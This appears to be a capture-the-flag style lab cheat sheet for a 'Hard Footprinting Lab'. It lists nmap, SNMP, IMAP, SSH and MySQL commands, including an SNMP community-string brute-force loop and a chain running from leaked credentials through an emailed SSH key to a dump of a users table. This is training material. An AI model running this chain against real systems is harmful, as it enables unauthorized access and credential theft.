🛡️ Methodology Checklist
- Full TCP scan:
nmap -p- --min-rate 5000 -sV -sC [TARGET] - UDP scan:
sudo nmap -sU --top-ports 20 [TARGET] - SNMP walk:
snmpwalk -v2c -c [COMMUNITY] [TARGET] - FTP anonymous login check
- SMB null session:
smbclient -N -L //[TARGET] - SSH version and key fingerprint:
ssh-keyscan [TARGET] - DNS zone transfer attempt against discovered DNS server
- IPMI cipher 0 check:
ipmitool -I lanplus -C 0 -H [TARGET] -U admin -P "" user list
🎯 Operational Context
Think Dumber First: These commands are the exact sequence for the Hard Footprinting Lab. Run them in order. Each command builds on the previous result. When a command fails, check the previous step’s output for the correct parameter values. All flags in
[brackets]must be replaced with discovered values.
When you land here: Working through the Hard Footprinting Lab. Execute commands sequentially. Fill in discovered values (IPs, usernames, ports) as you progress. Expected output described in comments. Deviation from expected output means a previous step needs revisiting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -p- --min-rate 1000 -T4 [TARGET_IP] | Quick all-ports TCP scan |
sudo nmap -sV -sC [TARGET_IP] | Version + script scan |
sudo nmap -sU -p- [TARGET_IP] | UDP scan — don’t miss SNMP on 161 |
for community in public private manager admin backup cisco; do snmpwalk -v 2c -c $community [TARGET_IP] 1.3.6.1.2.1.1.1.0; done | Manual community string brute-force |
snmpwalk -v 2c -c backup [TARGET_IP] | Full SNMP walk with confirmed string |
openssl s_client -connect [TARGET_IP]:993 | Connect to IMAPS |
A1 LOGIN [USER] [PASS] | IMAP authentication |
A1 SELECT INBOX | Select inbox folder |
A1 FETCH 1 BODY[] | Read first email |
chmod 600 ~/tom_key | Fix SSH key permissions |
ssh -i ~/tom_key [USER]@[TARGET_IP] | SSH with private key |
cat .bash_history && cat .mysql_history | Check command history |
mysql -u [USER] -p | Local MySQL login |
use users; select * from users; | Dump users table |
🔬 Deep Dive & Workflow
Attack Chain: UDP Scan → SNMP credential leak → IMAP SSH key retrieval → SSH access → MySQL privilege escalation
Phase 1: Recon
- Standard TCP scans miss SNMP — always include
sudo nmap -sU -p 161 - Key finding: Port 161/UDP (SNMP)
Phase 2: SNMP — Entry Point
snmp-bruteoften fails on VPN due to packet loss → use manual loop- Community string
backupworks → full walk reveals process running with cleartext password in CLI args - Critical Finding:
tom:[PASSWORD]in process arguments
Phase 3: IMAP — Pivoting
- Connect to port 993 (IMAPS) with
openssl s_client - Login with SNMP-leaked credentials
- Email in INBOX contains OpenSSH private key for
tom
Phase 4: SSH Access
- Save private key →
chmod 600 ~/tom_key(mandatory — SSH rejects world-readable keys) ssh -i ~/tom_key tom@[TARGET_IP]
Phase 5: MySQL Privilege Escalation
cat .bash_history→ revealsmysql -u tom -pusage- Login to local MySQL with SNMP-leaked password
use users; select * from users;→ revealsHTBuser credentials
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Command fails with ‘connection refused’ | Wrong IP or service not running on expected port | Re-run nmap on that specific target; confirm service port from scan output |
| Authentication fails despite using discovered credentials | Credential belongs to different service | Try credentials on all open services; check for domain prefix requirement |
| nmap shows port filtered that should be open | Firewall or lab VM firewall active | Try from different approach; use existing access to reach service internally |
| Command returns partial output then hangs | Connection timeout or service instability | Add timeout flags; retry; some lab services restart after certain operations |
| Discovered path/file not accessible | Permission denied or path incorrect | Verify exact path with ls -la; check current user privileges; look for alternate paths |
📝 Reporting Trigger
Finding Title: (Lab command reference — no vulnerability per se; use these command sequences as evidence of your methodology in reporting exercises. Document which commands produced key findings.)